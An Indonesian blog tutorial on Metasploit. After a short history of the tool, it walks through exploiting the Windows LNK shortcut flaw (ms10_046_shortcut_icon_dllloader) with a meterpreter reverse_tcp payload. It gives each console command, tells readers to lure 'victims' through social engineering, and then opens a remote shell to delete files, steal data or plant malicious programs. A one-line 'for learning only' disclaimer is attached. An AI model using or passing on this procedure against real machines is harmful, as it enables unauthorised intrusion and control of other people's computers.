Metasploit adalah suatu software yang di gunakan untuk menguji ketahanan suatau sistem dengan menggunakan kelemahan sistem tersebut. Metasploit diciptakan oleh HD Moore pada tahun 2003 sebagai sebuah alat jaringan portabel menggunakan bahasa scripting Perl.
Kemudian, Metasploit Framework benar-benar ditulis ulang dalam bahasa pemrograman Ruby. Pada tanggal 21 Oktober 2009, Proyek Metasploit mengumumkan yang telah diakuisisi oleh Rapid7, sebuah perusahaan keamanan yang menyediakan solusi kerentanan manajemen terpadu.
Metasploit biasanya digunakan untuk menyerang application layer dengan 0 day attack (sekali penyerarngan (dalam beberapa kasus ada yang berkali-kali) yang merupakan metode penyerangan pada software yang belum di patch.
Metasploit biasa dikaitkan dengan istilah remote exploitation, maksudnya penyerang berada pada jarak jangkauan yang jauh dapat mengendalikan komputer korban. Metasploit menyerang dengan cara mengirimkan exploit pada komputer korban. Exploit ini berisi payload yang sudah ditentukan oleh penyerang.
Cukup perkenalan dengan Metasploit, sekarang kita belajar menggunakan Metasploit itu sendiri.
Secara Default Metasploit sudah terinstall di KALI Linux OS, tapi untuk OS selain kali linux, semisal ubuntu kita harus instal manual. Jadi langkah pertama yang harus kita lakukan adalah Download dan Install Metasploit Framework. Namun tata cara penggunaan tetap sama.
Download dan Install Metasploit Framework
Download Metasploit Framework disini setelah selesai, Ubuntu secara default akan menyimpan hasil download pada folder Download. Jadi lakukan perintah ini:cd DownloadsSetelah itu akan muncul tampilan GUI, tinggal klik next dan next saja.
sudo chmod +x (nama metasploit).run
sudo ./(nama metasploit).run
Oke, sampai disini saya asumsikan kalian sudah menginstall metasploit dan berhasil. jika belum, silakan tanyakan di komentar.
Here we go!
*jika gambar kurang jelas, Klik saja untuk memperbesar
1. Buka Metasploit
Untuk KALI Linux cara membukanya seperti ini, lakukan di terminal:
msfconsoledan untuk Ubuntu/selain Kali Linux
sudo msfconsole
2. Cari LNK
Ketik "search LNK"
3. Ikut Gambar
Setelah keluar hasil, maka ketik use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
4. set SRVHOST dan LHOST
Pada tahap ini, kita setting LHOST dan SRVHOST, ikuti gambar.
 | |
| ketik ifconfig lalu sesuaikan. Ini adalah IP saya 192.168.1.107 menggunakan wifi jadi wlan0 kalau kabel eth0 |
Kemudian, setelah di lihat IP kita, kita set ke LHOST dan SRVHOST nya:
set SRVHOST (IP KAMU)
set LHOST (IP KAMU)
show options
 |
| Maka hasilnya seperti ini |
5. set payload
ketik "set PAYLOAD windows/meterpreter/reverse_tcp" Tanpa tanda petik
6. Cek, apakah berhasil?
ketik "show options" , jika hasilnya seperti ini, maka berhasil:
7. Mulai Exploit
Ayo, kita mulai exploitnya dengan cara ketik "exploit" di terminal
Selesai Pembuatan Exploit, sekarang gunakan teknik Social Engginering kalian.
Pada tahap ini, kita sudah selesai membuat exploit untuk korban, langkah selanjutnya adalah membuat korban masuk ke jebakan exploit kita. Lagi-lagi teknik Soceng, alias Social Engineering di gunakan disini, cari cara sendiri, saya disini hanya berbagi cara orang jahat nge-anu korban dan hanya pembelajaran.
Oke, kita cek yuk... jika korban sudah membuka exploit kita.
Exploit kalian adalah IP Kalian
Perhatikan ketika saya membuka IP saya di Internet Explorer Milik Windows.
Setelah terminal kamu jadi seperti di atas, alias ada tulisan "Meterpreter session 1 opened blablabla" , tandanya sudah ada korban yang terjebak. Mari Kita eksekusi, oke, sekarang tekan CTRL+C
Eksekusi Korban
ketik
sessions -l
sessions -i 1
horeee, kita sudah masuk, ayoo lanjut eksekusi, kita masuk ke komputer korban, maksud saya "benar-benar" masuk.
ketik "shell" tanpa tanda petik.
kita sudah benar-benar masuk ke komputer korban, sampai tahap ini. Kita menggunakan perintah dasar windows (cmd) bukan menggunakan perintah linux lagi.
Sekarang kita sudah menguasai Komputer korban, kita bisa hapus, copy (download), copy (upload), menanam program jahat, uninstall aplikasi, dan masih banyak lagi.
(i) ini hanya sekedar pembelajaran, diluar itu, saya tidak bertanggung jawab.
Tidak ada komentar:
Posting Komentar